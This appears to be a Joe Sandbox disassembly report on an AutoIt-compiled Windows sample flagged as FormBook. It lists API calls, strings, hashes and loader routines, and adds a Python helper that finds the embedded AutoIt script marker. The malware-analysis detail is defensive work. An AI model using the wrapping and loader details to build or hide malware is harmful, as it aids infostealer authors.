                                                                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                • ImageList_ReplaceIcon.COMCTL32(0099F230,000000FF,00000000), ref: 00410552
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                • API String ID: 2914291525-1005189915
                                                                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                 Control-flow Graph (rendered graph omitted)

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(0099F230,000000FF,00000000), ref: 00410552
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                • String ID: #$0$AutoIt v3
                                                                                                • API String ID: 423443420-4155596026
                                                                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc
                                                                                                • String ID: Default
                                                                                                • API String ID: 1579825452-753088835
                                                                                                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                 Control-flow Graph: function at 0040F5C0 (internal calls to 00422240, 00413650, 00410E60, 00414D04, 004150D1 and 00414D30; rendered graph omitted)
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                • String ID: AU3!$EA06
                                                                                                • API String ID: 1268643489-2658333250
                                                                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
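The function above (fread/fseek/memmove/strcat with the string constants "AU3!" and "EA06") is the part of the AutoIt3 runtime that locates the embedded compiled script: concatenated, the two strings form the ASCII marker "AU3!EA06" that AutoIt-compiled executables carry in front of the script blob. The following Python is an added example, not code from this report or from the sample, for confirming the AutoIt wrapper in a suspect file and recording where the script starts. The 16-byte magic that precedes the ASCII marker is taken from public AutoIt unpacker documentation and is an assumption as far as this report is concerned; the demo buffer is constructed, not a real binary.

```python
"""Locate the AutoIt compiled-script marker in a binary.

Added example, not code from the Joe Sandbox report or from the analysed
sample. The report's function at 0040F5C0 references "AU3!" and "EA06";
together they form the ASCII marker "AU3!EA06" that AutoIt3-compiled
executables place in front of the embedded compiled script. Finding it
confirms the wrapper and gives the offset an unpacker would start from.
"""
from typing import List

AU3_MARKER = b"AU3!EA06"
# 16-byte magic reported by public AutoIt unpackers as directly preceding the
# ASCII marker. Assumption: not something this report shows; verify against a
# known-good AutoIt binary before relying on it.
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")


def is_pe(data: bytes) -> bool:
    """Minimal PE check: 'MZ' header and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_au3_markers(data: bytes) -> List[int]:
    """Return every offset at which AU3!EA06 occurs in the buffer."""
    hits, start = [], 0
    while True:
        idx = data.find(AU3_MARKER, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def magic_precedes(data: bytes, marker_offset: int) -> bool:
    """True if the 16-byte magic sits directly in front of the marker."""
    lo = marker_offset - len(AU3_MAGIC)
    return lo >= 0 and data[lo:marker_offset] == AU3_MAGIC


def scan_file(path: str) -> List[int]:
    """Read a file from disk and return the marker offsets found in it."""
    with open(path, "rb") as fh:
        return find_au3_markers(fh.read())


def build_demo_blob() -> bytes:
    """Constructed stand-in for a compiled AutoIt executable (not a real sample)."""
    dos = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little")  # e_lfanew = 0x40
    pe_sig = b"PE\x00\x00"
    filler = bytes(range(256)) * 4                              # 1024 bytes of "code"
    script = b"\x00" * 32                                       # stand-in script bytes
    return dos + pe_sig + filler + AU3_MAGIC + AU3_MARKER + script


if __name__ == "__main__":
    blob = build_demo_blob()
    print("PE header:", is_pe(blob))
    for off in find_au3_markers(blob):
        print(f"AU3!EA06 at 0x{off:x}, magic present: {magic_precedes(blob, off)}")
```

Run `scan_file()` against the dropped or submitted executable; a hit confirms the AutoIt layer and the offset tells you where to point an AutoIt script extractor. A FormBook verdict on an AutoIt-wrapped sample means the real payload is inside that script, not in the visible PE code.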

                                                                                                 Control-flow Graph: function at 00401100; basic blocks call DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW and CreatePopupMenu (rendered graph omitted)
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                • CreatePopupMenu.USER32 ref: 00401204
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                • String ID: TaskbarCreated
                                                                                                • API String ID: 129472671-2362178303
                                                                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                 Control-flow Graph: function at 004115D7 (internal calls to 004135BB, 00411988, 00417FC0, 0041130A, 004180AF and 00418105; rendered graph omitted)
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                • std::exception::exception.LIBCMT ref: 00411626
                                                                                                • std::exception::exception.LIBCMT ref: 00411640
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                • String ID: ,*H$4*H$@fI
                                                                                                • API String ID: 615853336-1459471987
                                                                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                 Control-flow Graph: function at 040D35E8; basic blocks call CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree (rendered graph omitted)
                                                                                                APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040D36B9
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040D38DF
Memory Dump Source
• Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
• Instruction ID: e3a08c2ea59228ef540b6939815ff6bf2a266e49283208694c57e5a9ed2f04b0
• Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
• Instruction Fuzzy Hash: 2CA11A74E00309EBDB14CFA4C894BEEBBB5BF48704F208169E915BB280D775AA49CF55

Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
• Basic blocks: 2119 (40e4c0-40e4e5: call 403350, RegOpenKeyExW); 2122 (427190-4271ae: RegQueryValueExW); 2123 (40e4eb-40e4f0); 2124 (4271b0-4271f5: call 4115d7, call 43652f, RegQueryValueExW); 2125 (42721a-42722a: RegCloseKey); 2130 (427210-427219: call 436508); 2131 (4271f7-42720e: call 402160)
• Edges: 2119->2122, 2119->2123, 2122->2124, 2122->2125, 2124->2130, 2124->2131, 2130->2125, 2131->2130
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
• Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
• Basic blocks: 2136 (410570-4105f1: CreateWindowExW ×2, ShowWindow ×2)
• Edges: none (single block)
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
• ShowWindow.USER32(?,00000000), ref: 004105EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
• Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
• Basic blocks: 2137 (40d33b8-40d34e5: call 40d1008, call 40d32a8, CreateFileW); 2144 (40d34ec-40d34fc); 2145 (40d34e7); 2148 (40d34fe); 2149 (40d3503-40d351d: VirtualAlloc); 2146 (40d359c-40d35a1); 2150 (40d351f); 2151 (40d3521-40d3538: ReadFile); 2152 (40d353c-40d3576: call 40d32e8, call 40d22a8); 2153 (40d353a); 2158 (40d3578-40d358d: call 40d3338); 2159 (40d3592-40d359a: ExitProcess)
• Edges: 2137->2144, 2137->2145, 2144->2148, 2144->2149, 2145->2146, 2148->2146, 2149->2150, 2149->2151, 2150->2146, 2151->2152, 2151->2153, 2152->2158, 2152->2159, 2153->2146, 2158->2159, 2159->2146
APIs
  • Part of subcall function 040D32A8: Sleep.KERNELBASE(000001F4), ref: 040D32B9
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040D34DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: QYUY5D46IUX0
• API String ID: 2694422964-1242009982
• Opcode ID: b26c7dc7d1bdbcca15c79cd15debbd365ff7e165cfc6215071152d4a9dcfe241
• Instruction ID: 2395e4802d521380aeaa7bd16a27f43b5cc58526a30aca3026a2304db918979c
• Opcode Fuzzy Hash: b26c7dc7d1bdbcca15c79cd15debbd365ff7e165cfc6215071152d4a9dcfe241
• Instruction Fuzzy Hash: 01515230D14349EBEF15DBA4C814BEFBB79AF48304F004199E609BB2C0D6796B49CB66

APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcsncpy.LIBCMT ref: 00401C41
• _wcscpy.LIBCMT ref: 00401C5D
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
• String ID: Line:
• API String ID: 1874344091-1585850449
• Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
• Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E

APIs
• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNELBASE(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 1607946009-824357125
• Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
• Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4

APIs
• SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
• SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
• _wcsncpy.LIBCMT ref: 004102ED
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
• _wcsncpy.LIBCMT ref: 00410340
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: _wcsncpy$DesktopFolderFromListMallocPath
• String ID:
• API String ID: 3170942423-0
• Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
• Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
